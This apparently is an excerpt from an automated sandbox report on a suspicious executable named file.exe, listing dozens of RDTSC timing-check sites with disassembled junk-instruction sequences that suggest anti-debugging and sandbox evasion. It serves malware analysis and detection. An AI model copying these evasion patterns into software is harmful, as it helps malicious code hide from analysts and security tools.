Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131A7B4 second address: 131A7DA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1548D0B310h 0x00000008 js 00007F1548D0B2F6h 0x0000000e jmp 00007F1548D0B304h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131A7DA second address: 131A7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F15490E9B8Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e ja 00007F15490E9B8Eh 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131A7FC second address: 131A827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007F1548D0B2FCh 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edi 0x0000000d jmp 00007F1548D0B2FAh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1548D0B2FBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131AECD second address: 131AEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F15490E9B8Eh 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007F15490E9B86h 0x00000013 pop ebx 0x00000014 popad 0x00000015 push edi 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131B4A1 second address: 131B4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131B4A8 second address: 131B4B2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F15490E9B92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131B4B2 second address: 131B4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131BA56 second address: 131BA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131BA5A second address: 131BA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131A2A4 second address: 131A2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F15490E9B94h 0x0000000f jnc 00007F15490E9B86h 0x00000015 popad 0x00000016 push ebx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F15490E9B8Ch 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131A2DB second address: 131A2DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1324E49 second address: 1324E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1324E4F second address: 1324E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jne 00007F1548D0B2FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1325C27 second address: 1325C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1326069 second address: 132607C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1548D0B2FDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132607C second address: 1326081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E439 second address: 129E43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E43F second address: 129E47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15490E9B8Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push edx 0x00000014 pop edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop edi 0x00000018 jne 00007F15490E9B9Dh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13282F8 second address: 132831C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1548D0B308h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132831C second address: 1328322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13284AE second address: 13284B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129FF9B second address: 129FFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F15490E9B91h 0x0000000b popad 0x0000000c jmp 00007F15490E9B95h 0x00000011 jmp 00007F15490E9B8Fh 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jmp 00007F15490E9B90h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132B379 second address: 132B37D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132B37D second address: 132B388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132E0E8 second address: 132E0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132E0EE second address: 132E0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132E252 second address: 132E28C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1548D0B309h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F1548D0B301h 0x00000013 jno 00007F1548D0B2FEh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F1548D0B2FAh 0x00000022 pushad 0x00000023 popad 0x00000024 push edx 0x00000025 pop edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E3E3 second address: 132E428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F15490E9B86h 0x0000000a pop eax 0x0000000b jmp 00007F15490E9B8Ah 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 jmp 00007F15490E9B92h 0x00000018 pop eax 0x00000019 jmp 00007F15490E9B97h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E428 second address: 132E42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E42E second address: 132E434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E434 second address: 132E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F1548D0B2F6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335809 second address: 133580D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133580D second address: 1335824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335824 second address: 133582C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334413 second address: 1334417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334417 second address: 133441F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133441F second address: 133442B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F1548D0B2F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133442B second address: 1334431 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334565 second address: 1334574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1548D0B2F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334574 second address: 1334580 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334580 second address: 1334584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6B9E second address: 12E6BA8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6BA8 second address: 12E6C3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B306h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D3031h], ecx 0x00000010 mov ebx, dword ptr [ebp+12497B2Ch] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F1548D0B2F8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 movsx edi, si 0x00000033 add eax, ebx 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F1548D0B2F8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f pushad 0x00000050 jmp 00007F1548D0B307h 0x00000055 mov edi, dword ptr [ebp+122D2A9Dh] 0x0000005b popad 0x0000005c push ecx 0x0000005d clc 0x0000005e pop edx 0x0000005f push eax 0x00000060 pushad 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133499C second address: 13349A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13349A0 second address: 13349D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1548D0B303h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F1548D0B31Ch 0x00000011 jp 00007F1548D0B302h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13349D5 second address: 13349D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339ACB second address: 1339ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F1548D0B2F6h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338DD0 second address: 1338DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338DD4 second address: 1338DF7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F1548D0B2F6h 0x00000011 jo 00007F1548D0B2F6h 0x00000017 jmp 00007F1548D0B2FBh 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338F55 second address: 1338F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F15490E9B86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13390A0 second address: 13390A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13390A4 second address: 13390A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13390A8 second address: 13390AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339203 second address: 133920D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C68F second address: 133C6A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1548D0B2F8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ebx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CA66 second address: 133CA6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CA6F second address: 133CAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1548D0B303h 0x00000009 jmp 00007F1548D0B2FCh 0x0000000e popad 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 push ecx 0x00000016 js 00007F1548D0B2F6h 0x0000001c jg 00007F1548D0B2F6h 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CAAD second address: 133CAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CAB1 second address: 133CACB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1548D0B301h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CACB second address: 133CAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F15490E9B86h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F15490E9B96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134382F second address: 1343837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1343837 second address: 1343841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F15490E9B86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134399E second address: 13439B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jne 00007F1548D0B2F6h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344172 second address: 1344176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344176 second address: 1344180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344180 second address: 1344190 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 ja 00007F15490E9B94h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344190 second address: 1344196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13449D5 second address: 13449DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344C83 second address: 1344C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1548D0B2F6h 0x0000000a popad 0x0000000b jnp 00007F1548D0B2FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344C96 second address: 1344C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344C9A second address: 1344CA6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344CA6 second address: 1344CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349BB7 second address: 1349BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349BBB second address: 1349BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349BC1 second address: 1349BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1548D0B303h 0x0000000b jnc 00007F1548D0B2FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349D02 second address: 1349D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349D0C second address: 1349D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349E86 second address: 1349EA0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007F15490E9B86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349EA0 second address: 1349EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F1548D0B2FBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349EB3 second address: 1349ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F15490E9B99h 0x0000000c jp 00007F15490E9B86h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349ED9 second address: 1349EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13560DD second address: 13560E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13560E1 second address: 13560E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13560E7 second address: 135612B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F15490E9BB5h 0x0000000f push ebx 0x00000010 jmp 00007F15490E9B93h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 jmp 00007F15490E9B90h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13563E0 second address: 13563E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13563E6 second address: 1356417 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F15490E9B93h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F15490E9B95h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356417 second address: 135641C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135641C second address: 135643A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F15490E9B93h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135643A second address: 135643E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135643E second address: 1356444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13565EF second address: 13565F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13565F3 second address: 1356603 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F15490E9B86h 0x00000010 rdtsc
